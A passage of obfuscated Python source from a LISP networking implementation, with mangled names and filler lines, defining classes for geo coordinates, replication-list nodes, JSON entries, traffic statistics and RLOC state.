Ooo0o0OoOO . we_are_last = False
return
if 50 - 50: I11i - OoOoOO00 + I1IiiI % Oo0Ooo / OoooooooOO - I1ii11iIi11i
if 26 - 26: IiII . Ii1I
if 35 - 35: I1ii11iIi11i + OOooOOo
if 88 - 88: O0
if 4 - 4: OoOoOO00 % iIii1I11I1II1 % OoooooooOO . oO0o
if 27 - 27: II111iiii - OoOoOO00
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ ooo ] ) :
self . use_elp_node = None
Ooo0o0OoOO . we_are_last = True
return
if 81 - 81: o0oOOo0O0Ooo - Oo0Ooo % IiII - ooOoO0o / O0
if 27 - 27: Oo0Ooo
if 15 - 15: iIii1I11I1II1 . OoOoOO00 % Ii1I / i1IIi . o0oOOo0O0Ooo
if 45 - 45: iIii1I11I1II1 - i1IIi % I1IiiI - I1Ii111 + oO0o
if 15 - 15: iIii1I11I1II1 - OoooooooOO / ooOoO0o
self . use_elp_node = self . elp_nodes [ ooo + 1 ]
return
if 83 - 83: IiII + I1Ii111 / OoOoOO00 * IiII . oO0o
if 22 - 22: O0 + ooOoO0o + I1Ii111
if 57 - 57: OOooOOo . ooOoO0o - OoooooooOO - I1ii11iIi11i * O0
class lisp_geo ( ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 85 - 85: I1IiiI * OoO0O00
if 63 - 63: I1IiiI - i11iIiiIii
def copy_geo ( self ) :
iiIi1ii1IiI = lisp_geo ( self . geo_name )
iiIi1ii1IiI . latitude = self . latitude
iiIi1ii1IiI . lat_mins = self . lat_mins
iiIi1ii1IiI . lat_secs = self . lat_secs
iiIi1ii1IiI . longitude = self . longitude
iiIi1ii1IiI . long_mins = self . long_mins
iiIi1ii1IiI . long_secs = self . long_secs
iiIi1ii1IiI . altitude = self . altitude
iiIi1ii1IiI . radius = self . radius
return ( iiIi1ii1IiI )
if 4 - 4: OOooOOo + iIii1I11I1II1 / I1IiiI * Ii1I
if 64 - 64: OoOoOO00
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 94 - 94: OOooOOo * OoooooooOO * o0oOOo0O0Ooo / I1Ii111 . II111iiii
if 37 - 37: O0 * II111iiii * I1IiiI - O0 - I11i / i1IIi
def parse_geo_string ( self , geo_str ) :
ooo = geo_str . find ( "]" )
if ( ooo != - 1 ) : geo_str = geo_str [ ooo + 1 : : ]
if 27 - 27: i11iIiiIii + iIii1I11I1II1
if 15 - 15: oO0o
if 69 - 69: II111iiii * O0 . ooOoO0o * IiII
if 25 - 25: I11i - I1ii11iIi11i . I1Ii111 . OoooooooOO
if 4 - 4: IiII * OoO0O00 % I1ii11iIi11i * Ii1I . iII111i
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , Iii1Ii1II1 = geo_str . split ( "/" )
self . radius = int ( Iii1Ii1II1 )
if 49 - 49: II111iiii % OOooOOo
if 19 - 19: I1ii11iIi11i - iIii1I11I1II1 % I1IiiI / OoooooooOO
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 12 - 12: ooOoO0o / II111iiii + OoO0O00
iiIiiiI = geo_str [ 0 : 4 ]
i1i11i1Iii = geo_str [ 4 : 8 ]
if 11 - 11: I11i * Ii1I * I1IiiI - I1IiiI % OoooooooOO
if 83 - 83: i11iIiiIii % iII111i * O0 % OoooooooOO
if 99 - 99: I1ii11iIi11i % I1ii11iIi11i * iII111i % oO0o
if 56 - 56: Oo0Ooo + i11iIiiIii - oO0o . Ii1I + IiII
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 19 - 19: I11i * OoooooooOO . i1IIi
if 100 - 100: II111iiii
if 95 - 95: iII111i
if 94 - 94: OoOoOO00 + OoooooooOO
self . latitude = int ( iiIiiiI [ 0 ] )
self . lat_mins = int ( iiIiiiI [ 1 ] )
self . lat_secs = int ( iiIiiiI [ 2 ] )
if ( iiIiiiI [ 3 ] == "N" ) : self . latitude = - self . latitude
if 92 - 92: i11iIiiIii * IiII * I1IiiI - oO0o / iII111i
if 1 - 1: ooOoO0o - OoO0O00 - o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i - I1Ii111
if 78 - 78: Oo0Ooo
if 27 - 27: Ii1I / oO0o - Ii1I / iIii1I11I1II1 + o0oOOo0O0Ooo . Ii1I
self . longitude = int ( i1i11i1Iii [ 0 ] )
self . long_mins = int ( i1i11i1Iii [ 1 ] )
self . long_secs = int ( i1i11i1Iii [ 2 ] )
if ( i1i11i1Iii [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 79 - 79: Ii1I % O0 * OOooOOo
if 41 - 41: I1ii11iIi11i . OoooooooOO * I1ii11iIi11i - oO0o
def print_geo ( self ) :
IiIIiiI1II = "N" if self . latitude < 0 else "S"
oo0 = "E" if self . longitude < 0 else "W"
if 58 - 58: I1IiiI * I1Ii111 + iII111i + iIii1I11I1II1 + I1IiiI
OooO0ooO0o0OO = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , IiIIiiI1II , abs ( self . longitude ) ,
self . long_mins , self . long_secs , oo0 )
if 78 - 78: Oo0Ooo + ooOoO0o
if ( self . no_geo_altitude ( ) == False ) :
OooO0ooO0o0OO += "-" + str ( self . altitude )
if 56 - 56: OoO0O00 / i1IIi + ooOoO0o . ooOoO0o . iII111i
if 37 - 37: iIii1I11I1II1 * OoOoOO00 . OoOoOO00 + OoooooooOO + OoO0O00
if 25 - 25: I1IiiI / IiII . OOooOOo . I1ii11iIi11i % i1IIi
if 12 - 12: O0 % O0
if 9 - 9: O0 . I1IiiI + I1ii11iIi11i / OOooOOo * I1ii11iIi11i
if ( self . radius != 0 ) : OooO0ooO0o0OO += "/{}" . format ( self . radius )
return ( OooO0ooO0o0OO )
if 10 - 10: IiII % o0oOOo0O0Ooo / O0 / II111iiii
if 81 - 81: Ii1I / o0oOOo0O0Ooo % OoOoOO00 . I1ii11iIi11i
def geo_url ( self ) :
Iii1ii = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
Iii1ii = "10" if ( Iii1ii == "" or Iii1ii . isdigit ( ) == False ) else Iii1ii
Ooo0oOO , I1Ii111Oo00o0o = self . dms_to_decimal ( )
o00oo0oo = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( Ooo0oOO , I1Ii111Oo00o0o , Ooo0oOO , I1Ii111Oo00o0o ,
# Oo0Ooo * o0oOOo0O0Ooo * I1ii11iIi11i * II111iiii
# o0oOOo0O0Ooo . iIii1I11I1II1 + ooOoO0o + II111iiii % iIii1I11I1II1 * IiII
Iii1ii )
return ( o00oo0oo )
if 89 - 89: O0 + I1IiiI / IiII + OoooooooOO - IiII
if 2 - 2: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1 % i11iIiiIii * OOooOOo
def print_geo_url ( self ) :
iiIi1ii1IiI = self . print_geo ( )
if ( self . radius == 0 ) :
o00oo0oo = self . geo_url ( )
iI = "<a href='{}'>{}</a>" . format ( o00oo0oo , iiIi1ii1IiI )
else :
o00oo0oo = iiIi1ii1IiI . replace ( "/" , "-" )
iI = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( o00oo0oo , iiIi1ii1IiI )
if 18 - 18: oO0o . I1ii11iIi11i % oO0o
return ( iI )
if 43 - 43: oO0o / ooOoO0o . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: iII111i * iII111i
def dms_to_decimal ( self ) :
Ooooooo0Oo , Ii1III11i , o0o0 = self . latitude , self . lat_mins , self . lat_secs
oOo00Oo0o = float ( abs ( Ooooooo0Oo ) )
oOo00Oo0o += float ( Ii1III11i * 60 + o0o0 ) / 3600
if ( Ooooooo0Oo > 0 ) : oOo00Oo0o = - oOo00Oo0o
oo00ooO0ooO = oOo00Oo0o
if 72 - 72: I1Ii111 * oO0o * iII111i * OoooooooOO % I1IiiI / OOooOOo
Ooooooo0Oo , Ii1III11i , o0o0 = self . longitude , self . long_mins , self . long_secs
oOo00Oo0o = float ( abs ( Ooooooo0Oo ) )
oOo00Oo0o += float ( Ii1III11i * 60 + o0o0 ) / 3600
if ( Ooooooo0Oo > 0 ) : oOo00Oo0o = - oOo00Oo0o
iI1II1I = oOo00Oo0o
return ( ( oo00ooO0ooO , iI1II1I ) )
if 27 - 27: Ii1I % IiII
if 100 - 100: oO0o . i11iIiiIii - ooOoO0o
def get_distance ( self , geo_point ) :
II11II1111 = self . dms_to_decimal ( )
IiiiOo = geo_point . dms_to_decimal ( )
O00oO00O0 = vincenty ( II11II1111 , IiiiOo )
return ( O00oO00O0 . km )
if 96 - 96: IiII * iIii1I11I1II1
if 75 - 75: oO0o + o0oOOo0O0Ooo . Ii1I * OoooooooOO + Ii1I - I1IiiI
def point_in_circle ( self , geo_point ) :
i1ii = self . get_distance ( geo_point )
return ( i1ii <= self . radius )
if 86 - 86: O0 * oO0o + Oo0Ooo / II111iiii + i1IIi
if 12 - 12: I1IiiI + OOooOOo / Ii1I % i11iIiiIii - I1Ii111 % I11i
def encode_geo ( self ) :
o0O000Ooo = socket . htons ( LISP_AFI_LCAF )
o0o0O0O0Oooo0 = socket . htons ( 20 + 2 )
ooOOooooo0Oo = 0
if 49 - 49: I11i * i1IIi - iII111i
Ooo0oOO = abs ( self . latitude )
Oo000ooo = ( ( self . lat_mins * 60 ) + self . lat_secs ) * 1000
if ( self . latitude < 0 ) : ooOOooooo0Oo |= 0x40
if 90 - 90: Ii1I * Ii1I % i11iIiiIii
I1Ii111Oo00o0o = abs ( self . longitude )
O0o0oo0o0o = ( ( self . long_mins * 60 ) + self . long_secs ) * 1000
if ( self . longitude < 0 ) : ooOOooooo0Oo |= 0x20
if 94 - 94: i11iIiiIii % I1ii11iIi11i % IiII - I1Ii111
O0O0OooO = 0
if ( self . no_geo_altitude ( ) == False ) :
O0O0OooO = socket . htonl ( self . altitude )
ooOOooooo0Oo |= 0x10
if 88 - 88: I1ii11iIi11i . i1IIi * iII111i
Iii1Ii1II1 = socket . htons ( self . radius )
if ( Iii1Ii1II1 != 0 ) : ooOOooooo0Oo |= 0x06
if 67 - 67: IiII + i11iIiiIii . II111iiii / OoOoOO00 + OoooooooOO + i11iIiiIii
iiIiIi = struct . pack ( "HBBBBH" , o0O000Ooo , 0 , 0 , LISP_LCAF_GEO_COORD_TYPE ,
0 , o0o0O0O0Oooo0 )
iiIiIi += struct . pack ( "BBHBBHBBHIHHH" , ooOOooooo0Oo , 0 , 0 , Ooo0oOO , Oo000ooo >> 16 ,
socket . htons ( Oo000ooo & 0x0ffff ) , I1Ii111Oo00o0o , O0o0oo0o0o >> 16 ,
socket . htons ( O0o0oo0o0o & 0xffff ) , O0O0OooO , Iii1Ii1II1 , 0 , 0 )
if 65 - 65: I11i * iII111i * II111iiii / o0oOOo0O0Ooo . O0
return ( iiIiIi )
if 11 - 11: Ii1I . OoooooooOO
if 34 - 34: iIii1I11I1II1 . i11iIiiIii - OoOoOO00
def decode_geo ( self , packet , lcaf_len , radius_hi ) :
O00oO00oOO00O = "BBHBBHBBHIHHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( lcaf_len < ooOoooOoo0oO ) : return ( None )
if 34 - 34: i11iIiiIii * OoooooooOO
ooOOooooo0Oo , Oo00o00o0000o , OoO0 , Ooo0oOO , i11IIII , Oo000ooo , I1Ii111Oo00o0o , ooOo0o0oOOoO00O , O0o0oo0o0o , O0O0OooO , Iii1Ii1II1 , i11IIo0o0 , O000oOOoOOO = struct . unpack ( O00oO00oOO00O ,
# ooOoO0o * O0 * i11iIiiIii . iII111i
packet [ : ooOoooOoo0oO ] )
if 48 - 48: ooOoO0o * o0oOOo0O0Ooo
if 99 - 99: oO0o / o0oOOo0O0Ooo . i11iIiiIii % OoooooooOO * O0
if 52 - 52: OOooOOo / ooOoO0o . II111iiii / Oo0Ooo
if 66 - 66: Ii1I * I1Ii111 * OoO0O00
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if ( O000oOOoOOO == LISP_AFI_LCAF ) : return ( None )
if 92 - 92: II111iiii * iII111i % OoOoOO00 % OoOoOO00 % i11iIiiIii
if ( ooOOooooo0Oo & 0x40 ) : Ooo0oOO = - Ooo0oOO
self . latitude = Ooo0oOO
O00oo0o = ( ( i11IIII << 16 ) | socket . ntohs ( Oo000ooo ) ) / 1000
self . lat_mins = O00oo0o / 60
self . lat_secs = O00oo0o % 60
if 48 - 48: OoooooooOO - O0 + I1IiiI - I11i
if ( ooOOooooo0Oo & 0x20 ) : I1Ii111Oo00o0o = - I1Ii111Oo00o0o
self . longitude = I1Ii111Oo00o0o
OoO0iI = ( ( ooOo0o0oOOoO00O << 16 ) | socket . ntohs ( O0o0oo0o0o ) ) / 1000
self . long_mins = OoO0iI / 60
self . long_secs = OoO0iI % 60
if 8 - 8: IiII * Ii1I / Ii1I * OoO0O00 . OoooooooOO . I1Ii111
self . altitude = socket . ntohl ( O0O0OooO ) if ( ooOOooooo0Oo & 0x10 ) else - 1
Iii1Ii1II1 = socket . ntohs ( Iii1Ii1II1 )
self . radius = Iii1Ii1II1 if ( ooOOooooo0Oo & 0x02 ) else Iii1Ii1II1 * 1000
if 18 - 18: I11i % OoooooooOO - Ii1I + IiII % II111iiii
self . geo_name = None
packet = packet [ ooOoooOoo0oO : : ]
if 49 - 49: IiII - o0oOOo0O0Ooo
if ( O000oOOoOOO != 0 ) :
self . rloc . afi = O000oOOoOOO
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 3 - 3: Oo0Ooo * O0 % OoooooooOO / O0 - Ii1I . iIii1I11I1II1
return ( packet )
if 30 - 30: OoO0O00 + OOooOOo * i11iIiiIii - OoOoOO00 * II111iiii - oO0o
if 22 - 22: i1IIi + IiII + iII111i - I1IiiI - I11i - I11i
if 50 - 50: O0 * I1IiiI / i11iIiiIii - I11i
if 28 - 28: i1IIi + O0 - i11iIiiIii - I1Ii111
if 54 - 54: iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
class lisp_rle_node ( ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . level = 0
self . translated_port = 0
self . rloc_name = None
if 34 - 34: I1IiiI - OoooooooOO . IiII - OOooOOo % IiII
if 19 - 19: IiII + I1ii11iIi11i % Oo0Ooo
def copy_rle_node ( self ) :
iIIII1iiIII = lisp_rle_node ( )
iIIII1iiIII . address . copy_address ( self . address )
iIIII1iiIII . level = self . level
iIIII1iiIII . translated_port = self . translated_port
iIIII1iiIII . rloc_name = self . rloc_name
return ( iIIII1iiIII )
if 32 - 32: OOooOOo
if 46 - 46: II111iiii . OoO0O00
def store_translated_rloc ( self , rloc , port ) :
self . address . copy_address ( rloc )
self . translated_port = port
if 97 - 97: oO0o
if 45 - 45: i11iIiiIii / IiII + OoO0O00
def get_encap_keys ( self ) :
IiI1iI1 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 55 - 55: Ii1I / II111iiii - oO0o
oo0o00OO = self . address . print_address_no_iid ( ) + ":" + IiI1iI1
if 58 - 58: i1IIi . OoooooooOO % iIii1I11I1II1 * o0oOOo0O0Ooo + O0 / oO0o
try :
oOoo0oO = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( oOoo0oO [ 1 ] ) : return ( oOoo0oO [ 1 ] . encrypt_key , oOoo0oO [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 77 - 77: I11i . I1ii11iIi11i
if 92 - 92: i11iIiiIii + I11i % I1IiiI / ooOoO0o
if 28 - 28: i1IIi . I1IiiI
if 41 - 41: I1ii11iIi11i . I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
class lisp_rle ( ) :
def __init__ ( self , name ) :
self . rle_name = name
self . rle_nodes = [ ]
self . rle_forwarding_list = [ ]
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
if 4 - 4: I1Ii111
def copy_rle ( self ) :
i1I1Ii11II1i = lisp_rle ( self . rle_name )
for iIIII1iiIII in self . rle_nodes :
i1I1Ii11II1i . rle_nodes . append ( iIIII1iiIII . copy_rle_node ( ) )
if 85 - 85: iIii1I11I1II1 % Oo0Ooo
i1I1Ii11II1i . build_forwarding_list ( )
return ( i1I1Ii11II1i )
if 20 - 20: IiII + i11iIiiIii * OOooOOo
if 27 - 27: O0 * OoO0O00 * I1ii11iIi11i
def print_rle ( self , html , do_formatting ) :
oO0O0Oo000 = ""
for iIIII1iiIII in self . rle_nodes :
IiI1iI1 = iIIII1iiIII . translated_port
if 40 - 40: O0 + oO0o - ooOoO0o + I1IiiI - IiII
O00OOOOooO0OO = ""
if ( iIIII1iiIII . rloc_name != None ) :
O00OOOOooO0OO = iIIII1iiIII . rloc_name
if ( do_formatting ) : O00OOOOooO0OO = blue ( O00OOOOooO0OO , html )
if 65 - 65: OoooooooOO / OoOoOO00 + I1IiiI - II111iiii / OoOoOO00
if 69 - 69: i11iIiiIii
oo0o00OO = iIIII1iiIII . address . print_address_no_iid ( )
if ( iIIII1iiIII . address . is_local ( ) ) : oo0o00OO = red ( oo0o00OO , html )
oO0O0Oo000 += "{}{}(L{}){}, " . format ( oo0o00OO , "" if IiI1iI1 == 0 else ":" + str ( IiI1iI1 ) , iIIII1iiIII . level ,
# I11i % o0oOOo0O0Ooo - o0oOOo0O0Ooo / OoO0O00 + Ii1I
"" if iIIII1iiIII . rloc_name == None else O00OOOOooO0OO )
if 72 - 72: I11i * ooOoO0o / iII111i . OoooooooOO + I1Ii111 + I1Ii111
return ( oO0O0Oo000 [ 0 : - 2 ] if oO0O0Oo000 != "" else "" )
if 35 - 35: Oo0Ooo + oO0o * o0oOOo0O0Ooo - iIii1I11I1II1 % I1ii11iIi11i * i11iIiiIii
if 56 - 56: iIii1I11I1II1 / I11i
def build_forwarding_list ( self ) :
IiiiIiii = - 1
for iIIII1iiIII in self . rle_nodes :
if ( IiiiIiii == - 1 ) :
if ( iIIII1iiIII . address . is_local ( ) ) : IiiiIiii = iIIII1iiIII . level
else :
if ( iIIII1iiIII . level > IiiiIiii ) : break
if 78 - 78: i11iIiiIii * OoO0O00 * Ii1I / i1IIi * OOooOOo + o0oOOo0O0Ooo
if 52 - 52: i1IIi % O0
IiiiIiii = 0 if IiiiIiii == - 1 else iIIII1iiIII . level
if 59 - 59: II111iiii + I1ii11iIi11i / iII111i . ooOoO0o
self . rle_forwarding_list = [ ]
for iIIII1iiIII in self . rle_nodes :
if ( iIIII1iiIII . level == IiiiIiii or ( IiiiIiii == 0 and
iIIII1iiIII . level == 128 ) ) :
if ( lisp_i_am_rtr == False and iIIII1iiIII . address . is_local ( ) ) :
oo0o00OO = iIIII1iiIII . address . print_address_no_iid ( )
lprint ( "Exclude local RLE RLOC {}" . format ( oo0o00OO ) )
continue
if 18 - 18: I1Ii111
self . rle_forwarding_list . append ( iIIII1iiIII )
if 40 - 40: OoOoOO00 / OOooOOo + O0
if 57 - 57: iII111i
if 94 - 94: i11iIiiIii
if 90 - 90: iII111i + i11iIiiIii + iII111i % I1IiiI % oO0o
if 71 - 71: ooOoO0o + OOooOOo * I1IiiI % I11i . I1Ii111 % OoooooooOO
class lisp_json ( ) :
def __init__ ( self , name , string ) :
self . json_name = name
self . json_string = string
if 7 - 7: iIii1I11I1II1
if 88 - 88: ooOoO0o
def add ( self ) :
self . delete ( )
lisp_json_list [ self . json_name ] = self
if 37 - 37: ooOoO0o * OoOoOO00 . ooOoO0o
if 47 - 47: iIii1I11I1II1 + iIii1I11I1II1 / Ii1I
def delete ( self ) :
if ( lisp_json_list . has_key ( self . json_name ) ) :
del ( lisp_json_list [ self . json_name ] )
lisp_json_list [ self . json_name ] = None
if 19 - 19: OOooOOo . OoOoOO00 % iIii1I11I1II1 % OoOoOO00
if 92 - 92: o0oOOo0O0Ooo + II111iiii
if 56 - 56: OoOoOO00 - OoOoOO00 / Ii1I
def print_json ( self , html ) :
oooIIi1i = self . json_string
o0Oo0o0ooOOO = "***"
if ( html ) : o0Oo0o0ooOOO = red ( o0Oo0o0ooOOO , html )
OoOoOO00OOo0O = o0Oo0o0ooOOO + self . json_string + o0Oo0o0ooOOO
if ( self . valid_json ( ) ) : return ( oooIIi1i )
return ( OoOoOO00OOo0O )
if 46 - 46: oO0o / Oo0Ooo + o0oOOo0O0Ooo . I1Ii111 % OoO0O00 % IiII
if 37 - 37: i11iIiiIii - OOooOOo . OOooOOo
def valid_json ( self ) :
try :
json . loads ( self . json_string )
except :
return ( False )
if 57 - 57: I1Ii111
return ( True )
if 60 - 60: OoooooooOO . I1ii11iIi11i * i11iIiiIii / Ii1I
if 39 - 39: O0 % Ii1I
if 63 - 63: OOooOOo / I1ii11iIi11i
if 11 - 11: O0 % iIii1I11I1II1
if 64 - 64: OoOoOO00 - oO0o
if 8 - 8: i11iIiiIii - iIii1I11I1II1 / I1Ii111 . i11iIiiIii % o0oOOo0O0Ooo / oO0o
class lisp_stats ( ) :
def __init__ ( self ) :
self . packet_count = 0
self . byte_count = 0
self . last_rate_check = 0
self . last_packet_count = 0
self . last_byte_count = 0
self . last_increment = None
if 36 - 36: IiII
if 53 - 53: OoooooooOO / I1IiiI % I11i + Oo0Ooo
def increment ( self , octets ) :
self . packet_count += 1
self . byte_count += octets
self . last_increment = lisp_get_timestamp ( )
if 15 - 15: O0
if 75 - 75: iII111i / OoOoOO00
def recent_packet_sec ( self ) :
if ( self . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_increment
return ( oO000o0Oo00 <= 1 )
if 2 - 2: i1IIi + oO0o % iII111i % I1ii11iIi11i + ooOoO0o . iII111i
if 26 - 26: I11i + o0oOOo0O0Ooo + Ii1I % I11i
def recent_packet_min ( self ) :
if ( self . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_increment
return ( oO000o0Oo00 <= 60 )
if 95 - 95: IiII - O0 * oO0o * O0
if 47 - 47: I1IiiI
def stat_colors ( self , c1 , c2 , html ) :
if ( self . recent_packet_sec ( ) ) :
return ( green_last_sec ( c1 ) , green_last_sec ( c2 ) )
if 20 - 20: I1Ii111
if ( self . recent_packet_min ( ) ) :
return ( green_last_min ( c1 ) , green_last_min ( c2 ) )
if 40 - 40: OoooooooOO / o0oOOo0O0Ooo + OoOoOO00
return ( c1 , c2 )
if 73 - 73: OOooOOo / Oo0Ooo
if 80 - 80: OoO0O00 + I1IiiI % i1IIi / I11i % i1IIi * i11iIiiIii
def normalize ( self , count ) :
count = str ( count )
II11i = len ( count )
if ( II11i > 12 ) :
count = count [ 0 : - 10 ] + "." + count [ - 10 : - 7 ] + "T"
return ( count )
if 6 - 6: II111iiii / o0oOOo0O0Ooo * O0 % I1ii11iIi11i
if ( II11i > 9 ) :
count = count [ 0 : - 9 ] + "." + count [ - 9 : - 7 ] + "B"
return ( count )
if 11 - 11: I1Ii111
if ( II11i > 6 ) :
count = count [ 0 : - 6 ] + "." + count [ - 6 ] + "M"
return ( count )
if 70 - 70: Ii1I
return ( count )
if 22 - 22: Ii1I
if 59 - 59: I1ii11iIi11i
def get_stats ( self , summary , html ) :
oO00o = self . last_rate_check
oO0Oo0oO0OOOO = self . last_packet_count
I1IIIiiIIIii1iII = self . last_byte_count
self . last_rate_check = lisp_get_timestamp ( )
self . last_packet_count = self . packet_count
self . last_byte_count = self . byte_count
if 90 - 90: iIii1I11I1II1 - II111iiii
o000O = self . last_rate_check - oO00o
if ( o000O == 0 ) :
iiiiiI1I1 = 0
OOoOO0 = 0
else :
iiiiiI1I1 = int ( ( self . packet_count - oO0Oo0oO0OOOO ) / o000O )
OOoOO0 = ( self . byte_count - I1IIIiiIIIii1iII ) / o000O
OOoOO0 = ( OOoOO0 * 8 ) / 1000000
OOoOO0 = round ( OOoOO0 , 2 )
if 99 - 99: IiII / OoO0O00 % Oo0Ooo * iIii1I11I1II1
if 89 - 89: I1Ii111 + Oo0Ooo - ooOoO0o
if 63 - 63: oO0o + OoOoOO00 - oO0o - Ii1I % ooOoO0o * I1Ii111
if 92 - 92: IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
if 12 - 12: I1IiiI
iI1IiIiIIII11 = self . normalize ( self . packet_count )
oOooO0O0 = self . normalize ( self . byte_count )
if 83 - 83: o0oOOo0O0Ooo * Oo0Ooo - oO0o + O0 / i11iIiiIii
if 64 - 64: OoO0O00 % OoOoOO00 % I1IiiI - Ii1I / IiII * Ii1I
if 74 - 74: IiII - O0 % OOooOOo % OoooooooOO - I11i
if 4 - 4: i1IIi + OoOoOO00 + iIii1I11I1II1 - i1IIi * i11iIiiIii
if 99 - 99: I1ii11iIi11i - O0 % II111iiii + ooOoO0o % OoO0O00 * Ii1I
if ( summary ) :
i1I1ii111 = "<br>" if html else ""
iI1IiIiIIII11 , oOooO0O0 = self . stat_colors ( iI1IiIiIIII11 , oOooO0O0 , html )
OO0ooo0O = "packet-count: {}{}byte-count: {}" . format ( iI1IiIiIIII11 , i1I1ii111 , oOooO0O0 )
i1I1IiiIi = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( iiiiiI1I1 , OOoOO0 )
if 19 - 19: O0 / I1Ii111 + I1Ii111 . I1ii11iIi11i
if ( html != "" ) : i1I1IiiIi = lisp_span ( OO0ooo0O , i1I1IiiIi )
else :
II11 = str ( iiiiiI1I1 )
iI1II1IiIiIi = str ( OOoOO0 )
if ( html ) :
iI1IiIiIIII11 = lisp_print_cour ( iI1IiIiIIII11 )
II11 = lisp_print_cour ( II11 )
oOooO0O0 = lisp_print_cour ( oOooO0O0 )
iI1II1IiIiIi = lisp_print_cour ( iI1II1IiIiIi )
if 9 - 9: I1Ii111 * II111iiii % Ii1I - Ii1I % OoO0O00 % o0oOOo0O0Ooo
i1I1ii111 = "<br>" if html else ", "
if 26 - 26: o0oOOo0O0Ooo - I1IiiI / OoooooooOO / ooOoO0o % iIii1I11I1II1 % I1ii11iIi11i
i1I1IiiIi = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( iI1IiIiIIII11 , i1I1ii111 , II11 , i1I1ii111 , oOooO0O0 , i1I1ii111 ,
# Ii1I
iI1II1IiIiIi )
if 88 - 88: OoooooooOO
return ( i1I1IiiIi )
if 60 - 60: II111iiii % Oo0Ooo * I11i * OoO0O00 - OoOoOO00
if 65 - 65: iII111i
if 86 - 86: OoO0O00 / II111iiii % OoOoOO00 * OOooOOo . I1IiiI / IiII
if 100 - 100: i1IIi / I1IiiI * I1ii11iIi11i % ooOoO0o + OoO0O00 * oO0o
if 51 - 51: I1Ii111 - OoooooooOO / iII111i / I1IiiI % ooOoO0o / OoO0O00
if 45 - 45: i11iIiiIii - II111iiii / i1IIi * OoOoOO00
if 1 - 1: OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
lisp_decap_stats = {
"good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
"checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
"no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
"outer-header-error" : lisp_stats ( )
}
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
if 73 - 73: Oo0Ooo . OoOoOO00
if ( recurse == False ) : return
if 50 - 50: IiII / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
oOOoO = lisp_get_default_route_next_hops ( )
if ( oOOoO == [ ] or len ( oOOoO ) == 1 ) : return
if 54 - 54: ooOoO0o
self . rloc_next_hop = oOOoO [ 0 ]
I1IIII = self
for iiIIII1I1ii in oOOoO [ 1 : : ] :
O0oo = lisp_rloc ( False )
